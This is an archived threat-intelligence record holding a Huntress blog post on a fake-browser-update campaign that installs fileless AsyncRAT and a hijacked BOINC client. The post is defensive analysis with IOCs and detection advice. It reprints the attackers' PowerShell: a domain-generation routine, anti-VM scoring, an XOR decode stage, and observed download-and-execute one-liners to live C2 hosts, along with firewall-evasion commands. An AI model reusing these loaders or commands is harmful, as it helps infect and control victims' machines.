{
	"id": "9ebda46a-0e20-408a-bba0-1cd3e8c7ac5d",
	"created_at": "2026-04-06T00:19:46.616713Z",
	"updated_at": "2026-04-10T03:23:52.044736Z",
	"deleted_at": null,
	"sha1_hash": "6c08f23aad2184d8e44cba02a8b646cf0e4aa07c",
	"title": "Fake Browser Updates Lead to BOINC Volunteer Computing Software | Huntress",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5939637,
	"plain_text": "Fake Browser Updates Lead to BOINC Volunteer Computing\r\nSoftware | Huntress\r\nArchived: 2026-04-05 18:51:27 UTC\r\nBeginning on July 4, 2024, Huntress observed new behaviors in conjunction with malware typically called\r\nSocGholish or FakeUpdates. This is a large malware group, with a number of new campaigns and similar malware\r\nemerging over the past couple of years. Huntress has written about SocGholish previously, and many of these same\r\nbehaviors haven’t changed. The infections typically begin as a result of a user visiting a compromised website, which\r\nresults in a fake browser update prompt to the user. Downloading and launching the update executes malicious code\r\nthat typically downloads more malware to the host. In past SocGholish infections, this has led to the installation of\r\none of several common RATs (such as AsyncRAT or NetSupport RAT) that provide Command and Control\r\nconnection to the infected host. In recent infections, some additional files and scripts were executed that varied from\r\nthe normal behaviors.\r\nInfection Chain\r\nInitial Access\r\nAs is typically the case with SocGholish infections, a malicious Javascript file is responsible for downloading the\r\nlater stages of the killchain. In this particular case, two disjointed chains occur, with one resulting in a fileless variant\r\nof AsyncRAT and the other ending in a malicious BOINC (Berkeley Open Infrastructure Network Computing Client)\r\ninstallation. The second stage for both are hosted on rzegzwre[.]top, but the BOINC chain is accessed by IP directly.\r\nThe PowerShell loaders are all heavily obfuscated, with most strings being stored as character arrays that are later\r\nreassembled. The scripts used to install BOINC aren’t only unobfuscated but also contain comments from the\r\nauthor––a welcome treat!\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 1 of 22\n\nFileless AsyncRAT Installation\r\nStage 1:\r\nThere isn’t much to this stage, it attempts an AMSI bypass using a technique detailed in a blog post by MDSec.\r\nThen, it makes a curl request to pull down the next stage.\r\n# Create the seed for the DGA\r\n$random = New-Object System.Random([int]((((Get-Date).DayOfYear + 3) / 7) + 2024) * 8842)\r\n$domain = \"\"\r\n# Generate the C2 URL using the seed\r\nfor ($i = 0; $i -lt 15; $i++) {\r\n$domain += \"abcdefghijklmn\"[$random.Next(0, 14)]\r\n}\r\n# Construct\r\n$stage2_url = \"http://\" + $domain + \".top/\" + $domain[0..1] -join \"\" + \"zio\" + $domain[5..6] -join \"\" + \".php?\r\ns=523\"\r\n# Download the next stage and run it\r\n$webclient_obj = (New-Object System.Net.WebClient).DownloadString($stage2_url)\r\nInvoke-Expression $webclient_obj\r\nStage 2:\r\nThis portion of the chain is responsible for decoding, decrypting, and decompressing Stage 3 of the PowerShell\r\nloader. This technique is used several times throughout the various PowerShell stages with different XOR keys.\r\n1. Decode the Base64 string\r\n2. XOR the bytes with the key \"bj3rtga4myi5\"\r\n3. Decompress the contents using gzip\r\n4. Run the result using IEX\r\n$asciiEncoding = [system.text.encoding]::ascii\r\nfunction DecryptAndDecompressStage3 {\r\nparam ( $encodedString )\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 2 of 22\n\n$decodedBytes = [system.convert]::FromBase64String($encodedString)\r\n$key = $asciiEncoding.GetBytes(\"bj3rtga4myi5\")\r\n$decryptedBytes = @()\r\nfor ($i = 0; $i -lt $decodedBytes.length; ) {\r\nfor ($j = 0; $j -lt $keyBytes.length; $j++) {\r\n$decryptedBytes += $decodedBytes[$i] -bxor $key[$j]\r\n$i++\r\nif ($i -ge $decodedBytes.Length) {\r\nbreak\r\n}\r\n}\r\n}\r\n$memoryStream = New-Object System.IO.MemoryStream (,$decryptedBytes)\r\n$outputStream = New-Object System.IO.MemoryStream\r\n$gzipStream = New-Object System.IO.Compression.GzipStream ($memoryStream,\r\n[IO.Compression.CompressionMode]::Decompress)\r\n$gzipStream.CopyTo($outputStream)\r\n$gzipStream.Close()\r\n$memoryStream.Close()\r\n[byte[]]$result = $outputStream.ToArray()\r\nreturn $result\r\n}\r\nThe following CyberChef recipe can be used to replicate the functionality, revealing the contents of Stage 3.\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 3 of 22\n\nFigure 1: CyberChef recipe to decode the obfuscated AsyncRAT PowerShell commands.\r\nStage 3:\r\nThis stage primarily revolves around Anti-VM functionality. It makes use of several well-known techniques to build\r\nup a “VM threshold” score that’s submitted as a parameter in the cURL request to get to the next stage.\r\n$global:bjyozlsw = $executioncontext\r\n$yzdgqukc = (get-mpcomputerstatus).\"IsVirtualMachine\"\r\nswitch ($true){\r\n{ $yzdgqukc -eq $true } {\r\n$lbuzgcrjsh += 89357076423\r\nbreak\r\n}\r\n{ $yzdgqukc -eq 3 } {\r\n$lbuzgcrjsh += 34004640925\r\nbreak\r\n}\r\n{ $yzdgqukc -eq $false } {\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 4 of 22\n\n$lbuzgcrjsh += 46369456716\r\nbreak\r\n}\r\n}\r\n$steawojpuvqil = (get-wmiobject \"Win32_VideoController\") | select-object \"AdapterDACType\"\r\nswitch ($true){\r\n{ $steawojpuvqil -match \"Intel\" -or $steawojpuvqil -match \"SeaBIOS\" } {\r\n$lbuzgcrjsh += 48523965806\r\nbreak\r\n}\r\n{ $steawojpuvqil -match \"Internal\" -or $steawojpuvqil -match \"Integrated\" } {\r\n$lbuzgcrjsh += 858682778\r\nbreak\r\n}\r\n{ $steawojpuvqil.length -le 3 } {\r\n$lbuzgcrjsh += 858682778\r\nbreak\r\n}\r\n}\r\n$vjxdsbgrwk = (get-ciminstance \"Win32_PnPEntity\" -property (\"DeviceId\")).(\"DeviceId\")\r\nswitch ($true){\r\n{ $vjxdsbgrwk -like \"VBOX\") } {\r\n$lbuzgcrjsh += 85326496687\r\nbreak\r\n}\r\n{ $vjxdsbgrwk -like \"*VMWVM*\" } {\r\n$lbuzgcrjsh += 37190077678\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 5 of 22\n\nbreak\r\n}\r\n{ $vjxdsbgrwk -like \"DEV_VMBUS\" } {\r\n$lbuzgcrjsh += 48327675524\r\nbreak\r\n}\r\n{ $vjxdsbgrwk -like \"*VMWARE*\" } {\r\n$lbuzgcrjsh += 59817531631\r\nbreak\r\n}\r\n}\r\n$lbuzgcrjsh += 386633230\r\n$lbuzgcrjsh += 320833415\r\n$lbuzgcrjsh += 537410027\r\nIt then makes use of the same Domain Generation Algorithm (DGA) used in previous stages to make a cURL request\r\nto fetch the final stage.\r\n$nyiprvqdbxcw = new-object System.Random([int]((((get-date).dayofyear + 3)/7) + 2024) * 8842)\r\nfor ($zhwvcnb = 0;$zhwvcnb -lt 15;$zhwvcnb++) {\r\n$adqopnkjz += \"abcdefghijklmn\"[$nyiprvqdbxcw.next(0, 14)]\r\n}\r\n$ea5npqrct2w94d8 = $adqopnkjz + \".top\"\r\n$w2lsb73c9azh54j=-join ((48..57) + (97..122) | Get-Random -Count 10| % {[char]$_});\r\n$1xmzd28jk5elua3=-join ((48..57) + (97..122) | Get-Random -Count 5 | % {[char]$_});\r\n$sny3zg257i18aqc=\"$($w2lsb73c9azh54j)$($findom)\";\r\n$global:block=(curl -useb \"http[:]//$ea5npqrct2w94d8/$sny3zg257i18aqc.php?\r\nid=$env:computername\u0026key=$lbuzgcrjsh\u0026s=523\");\r\niex $global:block\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 6 of 22\n\nFinal Payload:\r\nThe final payload is a similarly obfuscated version of AsyncRAT, which reaches out to a C2 server at\r\nga1yo3wu78v48hh[.]top. \r\nThe domains used here were registered recently to a registrar of “NICENIC INTERNATIONAL GROUP Co.,\r\nLimited” and a registrant country of South Africa. This is a very similar network infrastructure to that noted by\r\nAT\u0026T Alien Labs in January 2024 used by an adversary to install AsyncRAT.\r\nFigure 2: The domain used in this case for initial payloads\r\nFigure 3: The domain used by the final AsyncRAT payload.\r\nUsing Validin, we can clearly see the changes in the current C2 domain over time as a result of the DGA.\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 7 of 22\n\nFigure 4: Validin visualization of C2 infrastructure over time.\r\nBOINC Software Installed\r\nThe PowerShell WebRequest (using the “cURL” alias) in Stage 3 results in a number of files dropped to disk. The\r\nscript then removes some indicators and then creates a scheduled task that executes a suspicious file from the\r\n%appdata% directory.\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c curl -useb 216.245.184[.]105/1.php?\r\ns=boicn| iex\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 8 of 22\n\nFigure 5: Output from malicious PowerShell commands that creates a scheduled task.\r\nReviewing PowerShell Operational Event Logs (ID 4104), with ScriptBlock Logging enabled on the host, reveals\r\nthe script executed from the previous command. From here we can find out exactly what occurred on the host by\r\nexamining the script.\r\nIt creates a list of directory names and randomly chooses one of them to use on the host (using Get-Random\r\nPowerShell cmdlet, which utilizes numbers from 0 to [Int32]::MaxValue). Then it sets the full path and creates the\r\ndirectory.\r\nIt creates a list of possible names to use to name an executable file (with one possibility being to use none of these\r\noptions, which would result in just .exe as the file name).\r\nIt then removes the script that was dropped (downloaded as a result of the PS IWR command) and creates a file\r\nname for a ZIP file that gets downloaded and writes contents to the file.\r\nIt decompresses a ZIP file that was written to the host, deletes the ZIP file, and renames a file called BOINC.exe to a\r\nrandomly selected name from the list created previously.\r\nIt creates the Scheduled Task that'll execute BOINC using one of the names defined here.\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 9 of 22\n\nFigure 6: Strings from the process memory of PowerShell showing the Scheduled Task creation.\r\nThe task, with its actual name, as created by the script, is run on the host.\r\n\"C:\\Windows\\system32\\schtasks.exe\" /run /tn System_Health_Service_790926033\r\nIt creates a registry value.\r\nThis is a unique misspelling of the word “Experience” that’s been used in the past in conjunction with the name of a\r\nregistry run key used to store an often renamed version of NetSupport, used maliciously as C2. The registry key\r\ncreated here is just a simple Value containing only the number “1”. This may be used to mark the host as infected.\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" new-ItemProperty -Path\r\n\"HKCU:\\Software\\Microsoft\" -Name ExpirienceHost -Value 1\r\nWhy BOINC? \r\nWhile much of this activity is not new to SocGholish malware, the use of the software BOINC in the scheduled tasks\r\nis relatively unusual. BOINC is an open source software that can be found on GitHub. The readme file in the project\r\ndescribes it as “a software platform for ‘volunteer computing’: large-scale distributed high-throughput computing\r\nusing volunteered home computers and other resources.”\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 10 of 22\n\nFigure 7: BOINC website: Mission statement with Join and Download options\r\nBOINC facilitates connection to a remote server that can collect information and send tasks to the host for execution.\r\nThe intention is to use “donated” computer resources to contribute to the work of various legitimate science projects.\r\nIt’s similar to a cryptocurrency miner in that way (using computer resources to do work), and it’s actually designed to\r\nreward users with a specific type of cryptocurrency called Gridcoin, designed for this purpose.\r\nFigure 8: Gridcoin logo\r\nFigure 9: Gridcoin website with link to the BOINC project\r\nTypical use of BOINC would include selecting legitimate projects from official servers (like Rosetta@home) and\r\nreceiving and completing these tasks along with the Gridcoin rewards (offered only for completing legitimate,\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 11 of 22\n\nofficial tasks for real BOINC projects, according to an admin’s post on the forums).\r\nThese malicious installations of BOINC come configured to connect not to one of the legitimate BOINC servers but\r\ninstead to a look-a-like server such as Rosettahome[.]top. From a malicious server, host data can be collected, files\r\ncan be transferred, and any number of tasks can be sent down to the hosts and executed. So basically it can operate as\r\na C2––one that looks like it’s used to donate to science but instead is used by threat actors. These host connections\r\ncould be sold off as initial access vectors to be used by other actors and potentially used to execute ransomware. So\r\nfar, Huntress hasn’t observed any malicious activities or tasks being executed by the infected hosts.\r\nThe BOINC Project Administrators and community are aware of the ongoing misuse of the software, as forum posts\r\ngoing back to June 26, 2024 mention the same TTPs observed by Huntress. We also reached out to the BOINC\r\nProject to let them know we have also been observing and tracking these behaviors.\r\nFigure 10: Initial forum post from a Project Administrator about the software being used maliciously.\r\nFigure 11: Summary post of the details that BOINC was aware of the unauthorized use of the software\r\nthat was being reported.\r\nThe same behaviors observed by the user on the forum were also observed by Huntress, down to the same file paths,\r\nserver domains, and even file names for the BOINC client that was used. A recent OTX pulse created on July 12,\r\n2024 also shows many of the same domains, IP addresses, files, and TTPs observed by Huntress. \r\nMalicious software is installed as a service\r\nCopies of BOINC are downloaded to the C:\\USERNAME\\AppData\\Roaming folder and to several\r\nsubfolders\r\nBOINC client executables are renamed to: .exe, gupdate.exe, SecurityHealthService.exe, whost.exe, and\r\ntrustedinstaller.exe\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 12 of 22\n\nScheduled tasks created to execute the renamed BOINC clients\r\nWe observed active connections from trustedinstaller.exe (renamed BOINC) to 104.238.34[.]204 on one of the\r\nhosts. This was one of two similar malicious BOINC servers, with one of them containing over 8,000 active\r\nconnections.\r\nServer initialization is recorded in the project status page, so we can see that RosettaHome[.]top was started on June\r\n15, 2024 at 13:58:29 UTC.\r\nFigure 12: A host name “rosettatest” shown connected to the server.\r\nAnother server at rosettahome[.]cn was started at the exact same time.\r\nBoth hosts attempted to obscure and hide user statistics by removing /rosettahome/about.php. However, they both\r\nretained the alternative lookup methods:\r\n/rosettahome/show_user.php?userid=\u003cID\u003e\r\nand\r\n/rosettahome/hosts_users.php.\r\nEnumeration of projects is still possible via these pages.\r\nUsing these exposed client lists, we’re able to determine the total machines connected to each of these C2 servers\r\nover time:\r\n8,453 clients connected to rosettahome[.]cn as of 12:45PM PST on July 15, 2024:\r\nFigure 13: Hosts connected to the first malicious BOINC server shown from in the Server Admin site.\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 13 of 22\n\n1,579 clients connected to rosettahome[.]top as of 12:45PM PST on July 15, 2024:\r\nFigure 14: Hosts connected to the second malicious BOINC server observed.\r\nInterestingly, as of 12:58PM PST on July 15, both servers we observed showed no tasks had been executed on the\r\nhosts, meaning that no functionality of the BOINC communication protocols, such as tasks or computing, appeared\r\nto have ever been issued.\r\nFigure 15: Malicious server Project Status page.\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 14 of 22\n\nFigure 16: Second malicious server Project Status page.\r\nBoth domains used for these servers were recently created:\r\nFigure 17: WHOIS info for rosettahome[.]top\r\nFigure 18: WHOIS info for rosettahome[.]cn\r\nFigure 19: VirusTotal Passive DNS info for malicious IP address\r\nThe files seen communicating to the domain are related to the BOINC software (these XML files are part of the\r\nstandard BOINC configuration).\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 15 of 22\n\nFigure 20: VirusTotal showing files connecting to the malicious domain.\r\nThe motivation and intent of the threat actor by loading this software onto infected hosts isn’t clear at this point. We\r\ndon’t have clear evidence that any additional malware has been loaded in the cases we’ve seen. It’s possible to load\r\nadditional software both during the installation of BOINC and as tasks from the remote BOINC servers, but we\r\nhaven’t observed either occurring (our ability to investigate and collect artifacts was often limited as the hosts were\r\ntaken offline post-infection or remediated). Infected clients actively connecting to malicious BOINC servers present\r\na fairly high risk, as there’s potential for a motivated threat actor to misuse this connection and execute any number\r\nof malicious commands or software on the host to further escalate privileges or move laterally through a network and\r\ncompromise an entire domain.\r\nPersistence\r\nScheduled tasks were created at several points in the infection. As a result of the AsyncRAT, scheduled tasks were\r\ncreated to maintain a connection to the C2.\r\nASYNC RAT Scheduled Task:\r\n\"command_with_args\": \"conhost --headless powershell .$([char](9268-9163)+'ex') (get-content 'C:\\\\Users\\\\\u003credacted\r\n\"description\": \"Maintenance task\",\r\n\"name\": \"Get-PhysicalExtentAssociation_QoS\",\r\n\"task_file\": \"C:\\\\Windows\\\\System32\\\\Tasks\\\\Get-PhysicalExtentAssociation_QoS\",\r\nBOINC Scheduled Task:\r\n\"command_with_args\": \"C:\\\\Users\\\\\u003credacted\u003e\\\\AppData\\\\Roaming\\\\EULA Updater\\\\SecurityHealthService.exe --detach_c\r\n\"name\": \"CleanUpMgrTask_1322139014\",\r\n\"task_file\": \"C:\\\\Windows\\\\System32\\\\Tasks\\\\CleanUpMgrTask_1322139014\",\r\n\"working_directory\": \"C:\\\\Users\\\\\u003credacted\u003el\\\\AppData\\\\Roaming\\\\EULA Updater\",\r\nScheduled Task Name (Base64 encoded command to disable some internet/firewall settings):\r\nGoogle_Maintenance_Worker\r\nScheduled Task Name (AsyncRAT):\r\nGet-PhysicalExtentAssociation_QoS\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 16 of 22\n\nScheduled Task Names (BOINC client):\r\nMoziilaUpdateService_[0-9]{1,10}\r\nGoogle_Maintenance_[0-9]{1,10}\r\nSystem_Health_Service_[0-9]{1,10}\r\nCleanUpMgrTask_[0-9]{,110}\r\n_[0-9]{8,10}\r\nAssociated Malware Families\r\nThere’s a growing number of campaigns and malware with overlapping techniques, especially using fake browser\r\nupdates as the initial access method. The TTPs observed here overlap most closely with SocGholish, which is most\r\nknown for using the initial malicious file called update.js as opposed to other naming conventions used by similar\r\nmalware that include version numbers or the word “installer” or the name of a specific browser in the file name.\r\nSome of the follow-up activities, such as the installation of AsyncRAT also follow most closely with SocGholish.\r\nPalo Alto’s Unit42 observed similar TTPs in February 2024, including the use of a similarly named .log file\r\n(containing the obfuscated AsyncRAT PowerShell) called by a headless conhost.exe command in a scheduled task,\r\nand similarly named C2 domain names created by DGA.\r\nBehaviors Overlapping with SocGholish/FakeUpdates\r\nInitial Access method (update.js Fake Browser Update)\r\nTop-level domain (.top)\r\nPowerShell WebRequest to download .svg file\r\nInstalling AsyncRAT (via the .svg file download)\r\nDefender Alert on the Update.js file\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 17 of 22\n\nFigure 21: Microsoft Defender Detection for FakeUpdates\r\nBehaviors Overlapping with AsyncRAT\r\nPowerShell download using .log file containing obfuscated code\r\nPowerShell commands from headless conhost.exe\r\nPersistence executing PowerShell commands\r\nC2 server using DGA domains ending in .top\r\nThe behaviors and indicators observed were consistent with previously seen methods for using fileless AsyncRAT (as\r\nopposed to the C# binary version) executed by PowerShell. The specific method for persistence (using Conhost\r\ncommands in scheduled tasks) is also consistent with previously observed AsyncRAT. The domains we observed\r\nwere similar to those noted by others as being used with AsyncRAT.\r\nDetection Opportunities\r\nThe use of well-known, typical malware families such as SocGholish and AsyncRAT together provides excellent\r\nopportunities to detect and track behaviors of these families (or similar malware). This makes it much easier to\r\nidentify new tactics being used. When one behavior changes, the other likely hasn’t changed. So you can explore the\r\ndetections that were created to find new behaviors that varied for the usual and potentially weren’t detected. This is\r\nwhat happened in this case. Familiar and consistent behaviors led to uncovering some new behaviors that can be\r\ndetected in the future as well.\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 18 of 22\n\nDetection Opportunity #1: Execution of BOINC Software\r\nWhile BOINC is legitimate software, its use should be rare (especially on systems at a business or organization). So\r\nin most environments, detecting any time BOINC is installed would be an easy way to stop any attacks that try to\r\nutilize it.\r\nSigma Rule - Potential BOINC Software Execution\r\nYARA Rule - BOINC Software Signature\r\nMuch more rare than using BOINC.exe legitimately would be the use of the BOINC client software that has been\r\nrenamed to something else. There are a number of methods that could be used to detect this behavior in this attack: \r\nProcess creation using BOINC.exe (Original File Name) with a process name other than BOINC.exe\r\nWindows PowerShell Event Log ID 4104 (with ScriptBlock logging enabled) that contains the string:\r\nrename-item \"boinc.exe\" as seen in the malicious script used in this attack\r\nSigma Rule - Renamed BOINC\r\nMonitor for a Scheduled Task that executes BOINC.exe (especially out of directories other than C:\\Program Files.\r\nThis task was created using a heavily obfuscated PowerShell script (which was removed from the host immediately).\r\nThis would be difficult to detect through process command line data alone. The script did contain interesting strings\r\n(found in de-obfuscated form in the 4104 PowerShell Operational Event Logs) that could be interesting to hunt for,\r\nsuch as using predefined variables in the commands to create the task itself.\r\nRegister-ScheduledTask -Action $Action -Trigger $Trigger -TaskName “$tasknm” -Settings $Settings;\r\nSchtasks.exe /r /tn “$taskm”\r\nWindows Security Event ID 4698 monitors Scheduled Task creation. Monitor these events for any suspicious new\r\ntasks in your environment that may execute software from suspicious new locations, such as subdirectories under\r\n%appdata% directory.\r\nDetection Opportunity #2: Suspicious PowerShell\r\nMonitor for web traffic and process data (especially PowerShell downloads and Web-Requests) reaching out to\r\nsuspicious .top domains (likely created by a Domain Generation Algorithm) and investigate the source for possible\r\nSocGholish or AsyncRAT malware.\r\nIn this infection, and commonly observed in AsyncRAT commands and scheduled tasks, we observed the use of\r\nconhost.exe with the –-headless parameter to execute PowerShell commands (which made connections to the C2\r\nserver). While conhost.exe is sometimes run this way by legitimate software, it’s not typically used to execute\r\nPowerShell.\r\nSigma Rule - PowerShell from Headless Conhost\r\nDetection Opportunity #3: Suspicious Process Name\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 19 of 22\n\nThe PowerShell script used to download BOINC to the host also renamed the executable file from a list of names\r\nand a command to randomly choose a name from the list. This process included an option to not use a name at all,\r\nand we observed the BOINC software running as a process with no process name at all. The process name was\r\nsimply .exe. While in rare cases this may be used legitimately, it should be rare. We recommend investigating any\r\nprocess with no file name (just a file extension and file path).\r\nSigma Rule - Process with No Name\r\nIOCs\r\nNetwork Indicators\r\nIP Domain Usage\r\n64.7.199[.]144 rosetta[.]top Malicious BOINC Server\r\n104.238.34[.]204 rosetta[.]top Malicious BOINC Server\r\n104.200.73[.]68 rosetta[.]cn Malicious BOINC Server\r\n216.245.184[.]105 rzegzwre[.]top C2 Server\r\n64.94.84[.]200 klmnnilmahlkcje[.]top C2 Server\r\n5.161.214[.]209 ga1yo3wu78v48hh[.]top C2 Server\r\nFile Indicators\r\nFile Hash\r\n(Renamed BOINC.exe)  \r\nSecurityhealthservice.exe,\r\nTrustedinstaller.exe, Gupdate.exe,\r\nghost.exe, .exe\r\n91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3\r\nupdate.js 4716011ca9325480069bffeb2bbe0629fec6e5f69746f2e47f0a6894f2858c0b\r\nupdate.js 380bd5f097b8501618cf8b312d68e97b3220c31172f82973fce3084157caa15e\r\nDisable-NetAdapterPacketDirect.log\r\nc5bfe4ddcf576b432f4e6ccce10dd3d219ee5f54497e0cc903671783924414a6\r\nGet-PhysicalExtentAssociation_QoS.log\r\n01a8aeb0b350a1325c86c69722affd410ff886881a405743e1adb23538eff119\r\nObservables\r\nInitial Access (several stages):\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 20 of 22\n\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w h -c \"iwr -usebasicparsing\r\nhttp://rzegzwre.top/f23.svg |iex\"\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c curl -useb 216.245.184.105/1.php?\r\ns=boicn| iex\r\nDiscovery Command:\r\n\"C:\\Windows\\system32\\net.exe\" localgroup Administrators\r\nCommand and Control:\r\n\"C:\\\\Windows\\\\system32\\\\conhost.EXE\" --headless powershell .(-join (0..16| ForEach-Object {[char]([int]('07811512\r\nDefense Evasion:\r\n\"netsh.exe\" firewall add allowedprogram C:\\Program Files\\SentinelOne\\Sentinel Agent\r\n23.2.3.358\\SentinelDotNetFx.dll SystemUpdate ENABLE\r\n\"C:\\Windows\\system32\\conhost.EXE\" --headless powershell -ep bypass AzureGet-SmbSession\r\n\"C:\\WINDOWS\\system32\\conhost.EXE\" --headless powershell -ep bypass AzureRemove-NetEventSession\r\nThese commands don’t appear in Microsoft's Official Azure PowerShell documentation for 12, 11, or Azure 10\r\nPowerShell. They could potentially be an alias to the Get-SMBSession and Remove-NetEventSession commands\r\nbased on the name.\r\nGet-SmbSession - This retrieves information about the Server Message Block (SMB) sessions that are currently\r\nestablished between the SMB server and the associated clients. This could be used to discover other network systems\r\nand facilitate potential lateral movement.\r\nRemove-NetEventSession - This is to reset the network connection and stop logging of network events on that\r\ninterface.\r\nMITRE ATT\u0026CK Mapping\r\nTactic\r\nTechnique\r\nID\r\nTechnique Name Description\r\nExecution\r\nT1059\r\nCommand and Scripting\r\nInterpreter\r\nPowershell used to download payload\r\nT1059.001 Powershell Executed powershell scripts and commands\r\nT1059.003 Windows Command Shell\r\nUsed headless conhost.exe to launch\r\nBOINC\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 21 of 22\n\nTactic\r\nTechnique\r\nID\r\nTechnique Name Description\r\nPersistence T1053.005 Scheduled Task\r\nCreated Scheduled Tasks to execute the\r\nAsync RAT payload\r\nCreated scheduled Tasks to execute BOINC\r\nsoftware\r\nDefense\r\nevasion\r\nT1027\r\nObfuscated Files or\r\nInformation\r\nUsed obfuscated javascript file\r\nT1027.010 Command Obfuscation Used obfuscated powershell commands\r\nT1112 Modify Registry Added value to registry key\r\nT1036.004\r\nMasquerading: Masquerade\r\nTask or Service\r\nMasqueraded as legitimate Windows\r\nservices/tasks.\r\nMasqueraded as Mozilla and Google-related\r\ntasks.\r\nT1070.004 File Removal\r\nRemoved zip file that was downloaded with\r\npowershell\r\nT1553 Subvert Trust Controls\r\nUsed legitimate software with a valid\r\nsignature (BOINC)\r\nDiscovery T1082\r\nSystem Information\r\nDiscovery\r\nRan command to discover members of the\r\nlocal administrators group\r\nC\u0026C\r\nT1071.001\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nAsync RAT C2 communication\r\nBOINC software communication to server\r\nT1105 Tool Ingress Download BOINC Software\r\nSource: https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nhttps://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software"
	],
	"report_names": [
		"fake-browser-updates-lead-to-boinc-volunteer-computing-software"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434786,
	"ts_updated_at": 1775791432,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6c08f23aad2184d8e44cba02a8b646cf0e4aa07c.pdf",
		"text": "https://archive.orkl.eu/6c08f23aad2184d8e44cba02a8b646cf0e4aa07c.txt",
		"img": "https://archive.orkl.eu/6c08f23aad2184d8e44cba02a8b646cf0e4aa07c.jpg"
	}
}